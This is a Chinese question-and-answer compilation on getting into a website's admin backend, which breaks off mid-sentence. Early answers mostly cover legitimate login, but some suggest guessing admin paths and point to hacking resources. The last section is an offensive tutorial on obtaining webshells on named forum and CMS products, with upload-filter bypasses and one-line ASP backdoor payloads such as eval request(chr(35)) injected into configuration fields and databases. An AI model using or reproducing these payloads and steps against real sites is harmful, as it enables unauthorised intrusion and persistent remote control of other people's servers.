① 如何進入網站後台
可以按照如下方式進行操作:
進入網站的後台第一步你要找到網站的後台地址。找到網站後台地址後,一般都要輸入用戶名和密碼。當用戶名和密碼正確之後就能進入網站後台。你可以問問之前管理這個網站的人,也可以問做網站的人設定的用戶名和密碼。具體如下:
1、首先要進入到自己的網站後台.你必須知道自己的網站登錄名稱和密碼,如下圖中所表示。
② 如何進入網站後台管理系統
這個當然需要有後管理系統的入口,如果你們的後台是使用的織夢做的話,有專門的入口。
當然有了入口之外,還需要有相應的操作許可權,比如用戶名和密碼。
③ 一個網站的後台怎麼進入
那屬於黑客入侵的范疇,並沒有什麼後台網址的,那是利用IP地址進入他的伺服器,進行調整
④ 如何進入網站後台
需要知道網站後台的地址,就和訪問一般網頁一樣,在IE地址欄輸入其地址,一般就會出現輸入用戶名和密碼的登陸頁面,輸入正確的用戶名和密碼就可以進去了。
看你有沒有許可權咯!
⑤ 如何進入網站後台頁面
網站後台頁面一般不是隨便讓人進的.設計的時候就設置了一個比較」隱藏」的網址,以便於管理員登陸管理.如果你掃描到有網站有漏洞的話,就可以有機會找到這個」隱藏」的網址了.
這個真的不是一兩句話說得完的.有興趣的話去www.hack58.com去看看動畫,看人家怎麼入侵網站的.一般都有進入網站後台頁面這個環節的.你會明白的.
⑥ 如何進入網站後台管理
ASP網站可以在網址後面輸入 /admin 然後回車
比如www.xxx.com/admin
或者:/admin.asp
/admin_main
/admin_main.asp
/manage
等等等等,其實有軟體可以掃描你網站後台入口的,這里就不方便說了
⑦ 如何進入網站的後台
後台應該是單獨有個文件夾的,比如admin,你的域名加上admin就可以了。
比如你的域名是www.123.com,那後台就可以輸入www.123.com/admin就可以了。
⑧ 如何進入網站後台管理頁面
再完美無缺的網站,都是有後台支撐起來的。這樣,也自然擁有自己可以自行操作的後台。類似這樣的網站,或是個人網站,大型企業網站,都有他們獨立的登陸口或登陸頁面。
工具/原料:
需要登陸的平台
用戶名與密碼
方法/步驟:
1、輸入自己網站的地址,先進入網站,如圖所示。
注意事項:
1、登陸用戶名與密碼,不可隨意外借他們使用
2、設定好相應的登陸密保
⑨ 如何進入網站後台
在網址後面輸入admin,就可進入網站後台,有用戶名和密碼,要知道該網站的有用戶名和密碼才可進入,樓下的說的 「網站後台是管理員才能進的」沒錯。
⑩ 如何進入網站後台 獲取webshell進入後台
一、直接上傳獲得webshell
這種對php和jsp的一些程序比較常見,MolyX BOARD就是其中一例,直接在心情圖標管理上傳.php類型,雖然沒有提示,其實已經成功了,上傳的文 件url應該是http://forums/images/smiles/下,前一陣子的聯眾游戲站和網易的jsp系統漏洞就可以直接上傳jsp文件。文件名是原來的文件名,bo-blog後台可以可以直接上傳.php文件,上傳的文件路徑有提示。以及一年前十分流行的upfile.asp漏洞(動網5.0和6.0、早期的許多整站系統),因過濾上傳文件不嚴,導致用戶可以直接上傳webshell到網站任意可寫目錄中,從而拿到網站的管理員控制許可權。
二、添加修改上傳類型
現在很多的腳本程序上傳模塊不是只允許上傳合法文件類型,而大多數的系統是允許添加上傳類型,bbsxp後台可以添加asa|asP類型,ewebeditor的後台也可添加asa類型,通過修改後我們可以直接上傳asa後綴的webshell了,還有一種情況是過濾了.asp,可以添加.aspasp的文件類型來上傳獲得webshell。php系統的後台,我們可以添加.php.g1f的上傳類型,這是php的一個特性,最後的哪個只要不是已知的文件類型即可,php會將php.g1f作為.php來正常運行,從而也可成功拿到shell。LeadBbs3.14後台獲得webshell方法是:在上傳類型中增加asp ,注意,asp後面是有個空格的,然後在前台上傳ASP馬,當然也要在後面加個空格!
三、利用後台管理功能寫入webshell
上傳漏洞基本上補的也差不多了,所以我們進入後台後還可以通過修改相關文件來寫入webshell。比較的典型的有dvbbs6.0,還有leadbbs2.88等,直接在後台修改配置文件,寫入後綴是asp的文件。而LeadBbs3.14後台獲得webshell另一方法是:添加一個新的友情鏈接,在網站名稱處寫上冰狐最小馬即可,最小馬前後要隨便輸入一些字元,http:\\網站\inc\IncHtm\BoardLink.asp就是我們想要的shell。
四、利用後台管理向配置文件寫webshell
利用"""":""//"等符號構造最小馬寫入程序的配置文件,joekoe論壇,某某同學錄,沸騰展望新聞系統,COCOON Counter統計程序等等,還有很多php程序都可以,COCOON Counter統計程序舉例,在管理郵箱處添上cnhacker at 263 dot net":eval request(chr (35))//, 在配製文件中就是webmail="cnhacker at 263 dot net\":eval request(chr(35))//",還有一種方法就是寫上cnhacker at 263 dot net"%><%eval request(chr(35))%><%',這樣就會形成前後對應,最小馬也就運行了。<%eval request(chr(35))%>可以用lake2的eval發送端以及最新的2006 客戶端來連,需要說明的是資料庫插馬時候要選前者。再如動易2005,到文章中心管理-頂部菜單設置-菜單其它特效,插入一句話馬"%><%execute request("l")%><%',保存頂部欄目菜單參數設置成功後,我們就得到馬地址http://網站/admin/rootclass_menu_config.asp。
五、利用後台資料庫備份及恢復獲得webshell
主要是利用後台對access資料庫的「備份資料庫」或「恢復資料庫」功能,「備份的資料庫路徑」等變數沒有過濾導致可以把任意文件後綴改 為asp,從而得到webshell,msssql版的程序就直接應用了access版的代碼,導致sql版照樣可以利用。還可以備份網站asp文件為其他後綴 如.txt文件,從而可以查看並獲得網頁源代碼,並獲得更多的程序信息增加獲得webshell的機會。在實際運用中經常會碰到沒有上傳功能的時 候,但是有asp系統在運行,利用此方法來查看源代碼來獲得其資料庫的位置,為資料庫插馬來創造機會,動網論壇就有一個ip地址的資料庫,在後台的ip管理中可以插入最小馬然後備份成.asp文件即可。在談談突破上傳檢測的方法,很多asp程序在即使改了後綴名後也會提示文件非法,通過在.asp文件頭加上gif89a修改後綴為gif來騙過asp程序檢測達到上傳的目的,還有一種就是用記事本打開圖片文件,隨便粘貼一部分復制到asp木馬文件頭,修改gif後綴後上傳也可以突破檢測,然後備份為.asp文件,成功得到webshell。
六、利用資料庫壓縮功能
可以將數據的防下載失效從而使插入資料庫的最小馬成功運行,比較典型的就是loveyuki的L-BLOG,在友情添加的url出寫上<%eval request (chr(35))%>, 提交後,在資料庫操作中壓縮資料庫,可以成功壓縮出.asp文件,用海洋的最小馬的eval客戶端連就得到一個webshell。
七、asp+mssql系統
這里需要提一點動網mssql版,但是可以直接本地提交來備份的。首先在發帖那上傳一個寫有asp代碼的假圖片,然後記住其上傳路徑。寫一個本地提交的表單